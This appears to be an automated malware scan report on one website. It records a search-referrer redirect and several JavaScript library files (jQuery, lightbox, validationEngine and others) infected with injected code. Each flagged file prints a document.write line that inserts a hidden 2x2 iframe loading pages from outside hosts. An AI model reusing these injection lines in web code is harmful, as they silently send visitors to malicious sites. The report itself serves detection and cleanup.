Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://sriroyalfoundation.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: sriroyalfoundation.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 16 Sep 2014 02:42:23 GMT Location: http://recruitingpartners.com/hehd.html?h=592695 Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.37 mod_bwlimited/1.4 Content-Length: 391 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://sriroyalfoundation.com/ | 200 OK Content-Length: 11475 Content-Type: text/html | clean |
http://sriroyalfoundation.com/js/jquery-1.7.1.min.js | 200 OK Content-Length: 94034 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695> | ||
http://sriroyalfoundation.com/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 11712 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695></iframe>');
(function(a){var b=function(b,c){var d=a.extend({},a.fn.nivoSlider.defaults,c);var e={currentSlide:0,currentImage:"",totalSlides:0,running:false,paused:false,stop:false};var f=a(b);f.data("nivo:vars",e);f.css("position","relative");f.addClass("nivoSlider");var g=f.children();g.each(function(){var b=a(this);var c="";i Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21394 Content-Type: text/javascript | clean |
http://sriroyalfoundation.com/index.html | 200 OK Content-Length: 11475 Content-Type: text/html | clean |
http://sriroyalfoundation.com/aboutus.html | 200 OK Content-Length: 8852 Content-Type: text/html | clean |
http://sriroyalfoundation.com/projects.html | 200 OK Content-Length: 18482 Content-Type: text/html | clean |
http://sriroyalfoundation.com/js/prototype.js | 200 OK Content-Length: 163312 Content-Type: application/javascript | clean |
http://sriroyalfoundation.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 3097 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
var Scriptaculous = { Version: '1.9.0', require: function(libraryName) { try{ document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); } catch(e) { var script = document.createElement('script'); script.type var js = /scriptaculous\.js(\?.*)?$/; $$('script[src]').findAll(function(s) { return s.src.match(js); }).each(function(s) { var path = s.src.replace(js, ''), includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } }; Scriptaculous.load(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695> | ||
http://sriroyalfoundation.com/js/lightbox.js | 200 OK Content-Length: 18674 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695></iframe>');
LightboxOptions = Object.extend({ fileLoadingImage: 'images/loading.gif', fileBottomNavCloseImage: 'images/closelabel.gif', overlayOpacity: 0.8, animate: true, resizeSpeed: 7, borderSize: 10, labelImage: "Image", labelOf: windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695> | ||
http://sriroyalfoundation.com/photo.html | 200 OK Content-Length: 7677 Content-Type: text/html | clean |
http://sriroyalfoundation.com/contactus.php | 200 OK Content-Length: 12365 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js | 200 OK Content-Length: 183184 Content-Type: text/javascript | clean |
http://sriroyalfoundation.com/js/jquery.validationEngine-en.js | 200 OK Content-Length: 6358 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
(function($){ $.fn.validationEngineLanguage = function(){ }; $.validationEngineLanguage = { newLang: function(){ $.validationEngineLanguage.allRules = { "required": { "regex": "none", "alertText": " "alertText": "* This name is already taken", "alertTextLoad": "* Validating, please wait" }, "validate2fields": { "alertText": "* Please input HELLO" } }; } }; $.validationEngineLanguage.newLang(); })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695> | ||
http://sriroyalfoundation.com/js/jquery.validationEngine.js | 200 OK Content-Length: 47260 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
(function($) { var methods = { init: function(options) { var form = this; if (!form.data('jqv') || form.data('jqv') == null ) { methods._saveOptions(form, options); $(".formError").live("click" methods.init.apply(form); return methods[method].apply(form, Array.prototype.slice.call(arguments, 1)); } else if (typeof method == 'object' || !method) { methods.init.apply(form, arguments); return methods.attach.apply(form); } else { $.error('Method ' + method + ' does not exist in jQuery.validationEngine'); } }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sriroyalfoundation.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sriroyalfoundation.com/
Result: sriroyalfoundation.com is not infected or malware details are not published yet.
Result: sriroyalfoundation.com is not infected or malware details are not published yet.